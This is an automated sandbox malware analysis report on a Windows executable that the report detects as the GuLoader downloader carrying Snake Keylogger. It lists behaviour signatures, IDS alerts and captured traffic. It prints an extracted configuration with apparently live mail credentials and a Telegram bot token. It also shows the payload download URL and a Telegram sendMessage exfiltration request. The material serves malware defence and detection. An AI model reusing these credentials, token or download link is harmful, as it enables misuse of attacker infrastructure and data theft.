Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Researches.exe

Overview

General Information

Sample name:Researches.exe
Analysis ID:1619372
MD5:c52b880eb8aaeee90ceddecd2b1ff4f8
SHA1:98f0771cfcd46fea300f8b93628e3be97a657401
SHA256:6e24c014d9214bbf4f57d547a64e3b0e8655784094673d97f0cb61cf37470ec6
Tags:exeguloadervipkeyloggeruser-malwarelabnet
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Researches.exe (PID: 4340 cmdline: "C:\Users\user\Desktop\Researches.exe" MD5: C52B880EB8AAEEE90CEDDECD2B1FF4F8)
    • Researches.exe (PID: 6308 cmdline: "C:\Users\user\Desktop\Researches.exe" MD5: C52B880EB8AAEEE90CEDDECD2B1FF4F8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Username": "dalila.russo@novacitacor.pt", "Password": "#Novasystem123#", "Host": "mail.novacitacor.pt", "Port": "587", "Token": "7502066508:AAGz5-yl79jZ7Tfefk024IrMFNLc6CGJF4I", "Chat_id": "6978326966", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.2951909943.0000000003D3A000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: Researches.exe PID: 6308JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Researches.exe PID: 6308JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T20:36:42.595862+010028033053Unknown Traffic192.168.2.657264104.21.32.1443TCP
          2025-02-19T20:36:46.448587+010028033053Unknown Traffic192.168.2.657268104.21.32.1443TCP
          2025-02-19T20:36:49.222346+010028033053Unknown Traffic192.168.2.657272104.21.32.1443TCP
          2025-02-19T20:36:50.582718+010028033053Unknown Traffic192.168.2.657274104.21.32.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T20:36:40.576666+010028032742Potentially Bad Traffic192.168.2.657262132.226.247.7380TCP
          2025-02-19T20:36:41.982869+010028032742Potentially Bad Traffic192.168.2.657262132.226.247.7380TCP
          2025-02-19T20:36:43.482859+010028032742Potentially Bad Traffic192.168.2.657265132.226.247.7380TCP
          2025-02-19T20:36:45.842249+010028032742Potentially Bad Traffic192.168.2.657267132.226.247.7380TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T20:36:35.737717+010028032702Potentially Bad Traffic192.168.2.657260142.250.181.238443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-19T20:36:54.276898+010018100071Potentially Bad Traffic192.168.2.657279149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 0000000B.00000002.3541070923.0000000033651000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "dalila.russo@novacitacor.pt", "Password": "#Novasystem123#", "Host": "mail.novacitacor.pt", "Port": "587", "Token": "7502066508:AAGz5-yl79jZ7Tfefk024IrMFNLc6CGJF4I", "Chat_id": "6978326966", "Version": "4.4"}
          Source: Researches.exeReversingLabs: Detection: 50%
          Source: Researches.exeVirustotal: Detection: 56%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36822408 CryptUnprotectData,11_2_36822408
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_36822B60 CryptUnprotectData,11_2_36822B60
          Source: Researches.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:57263 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 192.168.2.6:57264 -> 104.21.32.1:443 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.6:57260 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.6:57261 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:57279 version: TLS 1.2
          Source: C:\Users\user\Desktop\Researches.exeDirectory queried: number of queries: 1001
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
          Source: C:\Users\user\Desktop\Researches.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_00402706 FindFirstFileW,11_2_00402706
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405731
          Source: C:\Users\user\Desktop\Researches.exeCode function: 11_2_004061E5 FindFirstFileW,FindClose,11_2_004061E5
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 02D2F9AFh11_2_02D2F62F
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36632681h11_2_366323D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36632C48h11_2_36632830
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663FBF0h11_2_3663F8F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_36630673
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663E0C9h11_2_3663DE20
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663E9A1h11_2_3663E6F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663E549h11_2_3663E2A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36632C48h11_2_36632B76
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663EDF9h11_2_3663EB50
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663CE01h11_2_3663CB58
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36630D0Dh11_2_36630B30
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 366316F8h11_2_36630B30
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663C9A9h11_2_3663C700
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663F2A1h11_2_3663EFF8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_36630040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_36630853
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663F6F9h11_2_3663F450
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663D2A9h11_2_3663D000
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663D7F1h11_2_3663D548
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3663DC49h11_2_3663D9A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36821B25h11_2_368217E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36822EF0h11_2_36822C20
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682A47Eh11_2_3682A1B0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682CD56h11_2_3682CA88
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36821549h11_2_368212A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682AD9Eh11_2_3682AAD0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36828DAEh11_2_36828AE0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36826DBEh11_2_36826AF0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682A90Eh11_2_3682A640
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682891Eh11_2_36828650
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682692Eh11_2_36826660
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682724Eh11_2_36826F80
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682525Eh11_2_36824F90
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682D676h11_2_3682D3A8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682EE7Eh11_2_3682EBB0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682B697h11_2_3682B3F0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682D1E6h11_2_3682CF18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682E9EEh11_2_3682E720
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682B22Eh11_2_3682AF60
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682923Eh11_2_36828F70
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36829B5Eh11_2_36829890
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36827B6Eh11_2_368278A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36825B7Eh11_2_368258B0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682DF96h11_2_3682DCC8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682F79Eh11_2_3682F4D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682BFA6h11_2_3682BCD8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then mov esp, ebp11_2_36824CF8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368296CEh11_2_36829400
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368276DEh11_2_36827410
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368256EEh11_2_36825420
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682DB06h11_2_3682D838
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682F30Eh11_2_3682F040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682BB16h11_2_3682B848
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682848Eh11_2_368281C0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682649Eh11_2_368261D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36821079h11_2_36820DD0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682C8C6h11_2_3682C5F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then mov esp, ebp11_2_36824D09
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36829FEEh11_2_36829D20
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36827FFEh11_2_36827D30
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682600Eh11_2_36825D40
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682E428h11_2_3682E158
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682FC58h11_2_3682F960
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3682C436h11_2_3682C168
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36841B20h11_2_36841828
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3684AF58h11_2_3684AC60
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36842978h11_2_36842680
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36847F88h11_2_36847C90
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36841190h11_2_36840E98
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368467A0h11_2_368464A8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36844FB8h11_2_36844CC0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3684A5C8h11_2_3684A2D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368437D0h11_2_368434D8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36848DE0h11_2_36848AE8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36841FE8h11_2_36841CF0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3684A100h11_2_36849E08
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36843308h11_2_36843010
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36848918h11_2_36848620
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36847130h11_2_36846E38
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36840338h11_2_36840040
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36845948h11_2_36845650
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36844160h11_2_36843E68
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36849771h11_2_36849478
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36845480h11_2_36845188
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 3684AA90h11_2_3684A798
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36843C98h11_2_368439A0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368492A8h11_2_36848FB0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368424B0h11_2_368421B8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36847AC0h11_2_368477C8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36840CC8h11_2_368409D0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368462D8h11_2_36845FE0
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36844AF0h11_2_368447F8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 368475F8h11_2_36847300
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36840800h11_2_36840508
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36845E10h11_2_36845B18
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36844628h11_2_36844330
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36849C38h11_2_36849940
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36842E40h11_2_36842B48
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36848450h11_2_36848158
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36841658h11_2_36841360
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then jmp 36846C68h11_2_36846970
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_368C90E8
          Source: C:\Users\user\Desktop\Researches.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_368C90F8

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:57279 -> 149.154.167.220:443
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.6:57102 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2020/02/2025%20/%2004:19:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
          Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
          Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:57267 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:57265 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:57262 -> 132.226.247.73:80
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:57260 -> 142.250.181.238:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57264 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57274 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57268 -> 104.21.32.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57272 -> 104.21.32.1:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:57263 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 192.168.2.6:57264 -> 104.21.32.1:443 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1K_rVVeMRj--1K4Oil07wMr2Liu1M6eVs&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2020/02/2025%20/%2004:19:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
